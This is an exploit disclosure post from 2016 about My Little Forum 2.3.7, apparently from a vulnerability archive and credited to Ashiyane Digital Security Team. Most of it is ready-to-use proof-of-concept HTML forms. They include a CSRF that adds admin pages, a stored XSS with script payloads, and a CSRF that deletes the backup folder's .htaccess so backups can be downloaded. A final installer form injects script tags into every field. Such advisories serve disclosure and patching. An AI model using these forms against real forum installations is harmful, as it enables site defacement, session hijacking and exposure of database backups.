My Little Forum 2.3.7 Cross Site Request Forgery / Cross Site Scripting
Posted on 02 November 2016
Title: ====== My Little Forum 2.3.7 - Multiple Vulnerability Product & Service Introduction: =============================== My little forum is a simple PHP and MySQL based internet forum that displays the messages in classical threaded view (tree structure). It is Open Source licensed under the GNU General Public License. The main claim of this web forum is simplicity. Furthermore it should be easy to install and run on a standard server configuration with PHP and MySQL. Software Link: ============== https://github.com/ilosuna/mylittleforum/archive/master.zip Vulnerability Type: ========================= Cross-Site Request Forgery Stored Cross-Site Scripting CSRF Allow To Backup Disclosure Vulnerability Details: ============================== This WebApplication is vulnerable and suffer from some vulnerablity. Severity Level: =============== High Proof of Concept (PoC): ======================= 1. CSRF (Add Page) With this exploit can add page in webapp. <form action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page" method="post" accept-charset="utf-8"> <input type="hidden" name="mode" value="admin"> <input type="hidden" name="title" value="Title"> <input type="hidden" name="content" value="Content"> <input type="hidden" name="menu_linkname" value="Name"> <input type="submit" name="edit_page_submit" value="OK - Save page"> </form> 2. Stored XSS: <form action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page" method="post" accept-charset="utf-8"> <input type="hidden" name="mode" value="admin"> <input type="hidden" name="title" value="Stored XSS <script>alert(1)</script>"> <input type="hidden" name="content" value="Stored XSS <script>alert(2)</script>"> <input type="hidden" name="menu_linkname" value="Stored XSS <script>alert(3)</script>"> <input type="submit" name="edit_page_submit" value="OK - Save page"> </form> 3. Backup Disclosure: with this exploit we can delect htaccess in backup folder for access to backups. <form action="http://localhost/mylittleforum-master/index.php" method="post" accept-charset="utf-8"> <div> <input type="hidden" name="mode" value="admin"> <input type="hidden" name="delete_backup_files[]" value=".htaccess"> <input type="submit" name="delete_backup_files_confirm" value="OK - Delete"> </div> </form> Next use exploit go to: http://localhost/mylittleforum-master/backup/ Author: ================== Ashiyane Digital Security Team ======================= Title: ====== My Little Forum 2.3.7 (Installer) - Cross-Site Scripting Product & Service Introduction: =============================== My little forum is a simple PHP and MySQL based internet forum that displays the messages in classical threaded view (tree structure). It is Open Source licensed under the GNU General Public License. The main claim of this web forum is simplicity. Furthermore it should be easy to install and run on a standard server configuration with PHP and MySQL. Software Link: ============== https://github.com/ilosuna/mylittleforum/archive/master.zip Vulnerability Type: ========================= Cross-Site Scripting Vulnerability Details: ============================== Installer of My Little Forum is vulnerable to cross-site scripting. Proof of Concept (PoC): ======================= <html> <body> <form action="http://localhost/mylittleforum-master/install/index.php" method="post"> <input type="text" name="forum_name" value='"><script>alert(1)</script>'> <input type="text" name="forum_address" value='"><script>alert(2)</script>'> <input type="text" name="forum_email" value='"><script>alert(3)</script>'> <input type="text" name="admin_name" value='"><script>alert(4)</script>'> <input type="text" name="admin_email" value='"><script>alert(5)</script>'> <input type="text" name="host" value='"><script>alert(6)</script>'> <input type="text" name="database" value='"><script>alert(7)</script>'> <input type="text" name="user" value='"><script>alert(8)</script>'> <input type="text" name="table_prefix" value='"><script>alert(9)</script>'> <input type="submit" name="install_submit" value="OK - Install forum"> <input type="hidden" name="language_file" value="english.lang"> </form> </body> </html> Author: ================== Ashiyane Digital Security Team ||
